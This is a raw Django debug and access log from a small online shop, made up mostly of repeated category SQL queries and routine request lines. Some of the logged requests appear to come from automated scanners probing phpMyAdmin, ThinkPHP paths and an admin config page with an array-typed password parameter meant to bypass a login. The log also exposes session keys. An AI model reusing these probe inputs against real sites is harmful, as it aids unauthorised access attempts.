"shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-23 18:33:51,766 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-23 18:33:51,770 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-23 18:33:51,774 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-23 18:33:51,778 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-23 18:33:51,782 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-23 18:33:51,788 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-23 18:33:51,792 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-23 18:33:51,796 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-23 18:33:51,800 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-23 18:33:51,804 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-23 18:33:51,810 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-23 18:33:51,814 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-23 18:33:51,817 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-23 18:33:51,822 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-23 18:33:51,826 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-23 18:33:51,829 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-23 18:33:51,834 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-23 18:33:51,838 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-23 18:33:51,842 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-23 18:33:51,847 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-23 18:33:51,853 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [23/Dec/2019 18:33:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [23/Dec/2019 18:33:52] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [23/Dec/2019 18:33:52] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [23/Dec/2019 18:35:50] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:40:52] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:46:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 18:52:00] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:00:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 19:12:24] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:19:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:20:46] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:30:09] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:35:22] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:40:02] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 19:40:26] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:45:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:51:41] "GET / HTTP/1.0" 302 0 [23/Dec/2019 19:56:44] "GET / HTTP/1.0" 302 0 Not Found: /index.php [23/Dec/2019 19:57:56] "GET /index.php HTTP/1.0" 404 6447 Not Found: /phpmyadmin/index.php [23/Dec/2019 19:57:56] "GET /phpmyadmin/index.php HTTP/1.0" 404 6480 [23/Dec/2019 20:02:01] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:10:04] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:18:35] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:23:38] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:28:40] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [23/Dec/2019 20:31:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:33:56] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:39:30] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:44:32] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:49:35] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [23/Dec/2019 20:52:01] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [23/Dec/2019 20:52:02] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [23/Dec/2019 20:52:02] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [23/Dec/2019 20:52:03] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [23/Dec/2019 20:52:03] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [23/Dec/2019 20:52:03] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 [23/Dec/2019 20:52:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 20:52:10,064 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9wt3y3371tmad4tvbhcdic8wfwmqns1e' LIMIT 1; args=('9wt3y3371tmad4tvbhcdic8wfwmqns1e',) DEBUG 2019-12-23 20:52:10,066 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9wt3y3371tmad4tvbhcdic8wfwmqns1e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T20:52:10.064578+00:00'::timestamptz); args=('9wt3y3371tmad4tvbhcdic8wfwmqns1e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 20, 52, 10, 64578, tzinfo=)) [23/Dec/2019 20:52:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 20:54:38] "GET / HTTP/1.0" 302 0 [23/Dec/2019 20:55:46] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:00:02] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:06:35] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:10:06] "GET / HTTP/1.0" 302 0 Not Found: /index.php [23/Dec/2019 21:13:30] "GET /index.php HTTP/1.0" 404 6455 [23/Dec/2019 21:17:38] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:23:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:29:24] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 21:33:55] "GET /robots.txt HTTP/1.0" 404 6451 [23/Dec/2019 21:34:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 21:39:13] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [23/Dec/2019 21:39:16] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=193 HTTP/1.0" 404 6532 Not Found: /newslist.asp [23/Dec/2019 21:39:23] "GET /newslist.asp?type=4&id=1366 HTTP/1.0" 404 6476 [23/Dec/2019 21:41:21] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:43:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:46:37] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:51:40] "GET / HTTP/1.0" 302 0 [23/Dec/2019 21:56:42] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:10:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:15:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:20:42] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:25:45] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:30:47] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:36:20] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:41:35] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:48:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:53:11] "GET / HTTP/1.0" 302 0 [23/Dec/2019 22:58:13] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:02:27] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:02:56] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [23/Dec/2019 23:07:39] "GET /robots.txt HTTP/1.0" 404 6450 [23/Dec/2019 23:07:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-23 23:07:40,490 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ou6pseizduy01vnh0zdj6u51aako7twe' LIMIT 1; args=('ou6pseizduy01vnh0zdj6u51aako7twe',) DEBUG 2019-12-23 23:07:40,493 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ou6pseizduy01vnh0zdj6u51aako7twe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-06T23:07:40.490889+00:00'::timestamptz); args=('ou6pseizduy01vnh0zdj6u51aako7twe', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 6, 23, 7, 40, 490889, tzinfo=)) [23/Dec/2019 23:07:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [23/Dec/2019 23:10:06] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:20:11] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:29:36] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:34:39] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:39:41] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:44:44] "GET / HTTP/1.0" 302 0 [23/Dec/2019 23:53:24] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:00:02] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:13:35] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:13:37] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:18:38] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [24/Dec/2019 00:23:28] "GET /robots.txt HTTP/1.0" 404 6447 [24/Dec/2019 00:23:40] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:29:02] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:34:05] "GET / HTTP/1.0" 302 0 Not Found: //admin/config.php [24/Dec/2019 00:36:21] "GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin HTTP/1.0" 404 6516 [24/Dec/2019 00:39:07] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:47:50] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:54:40] "GET / HTTP/1.0" 302 0 [24/Dec/2019 00:59:43] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:16:02] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:21:05] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:26:07] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:31:10] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:39:44] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:44:46] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:49:49] "GET / HTTP/1.0" 302 0 [24/Dec/2019 01:55:42] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:00:51] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:06:38] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:11:40] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:18:41] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:23:43] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:24:55] "GET / HTTP/1.0" 302 0 [24/Dec/2019 02:28:46] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-25 06:18:56,047 utils 4252 140031732287232 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-25 06:18:56,058 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-25 06:18:56,062 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-25 06:18:56,064 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-25 06:18:56,068 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-25 06:18:56,070 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-25 06:18:56,072 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-25 06:18:56,075 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-25 06:18:56,077 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-25 06:18:56,081 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-25 06:18:56,083 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-25 06:18:56,087 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-25 06:18:56,091 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-25 06:18:56,095 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-25 06:18:56,100 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-25 06:18:56,102 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-25 06:18:56,104 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-25 06:18:56,106 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-25 06:18:56,109 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-25 06:18:56,112 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-25 06:18:56,114 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-25 06:18:56,116 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 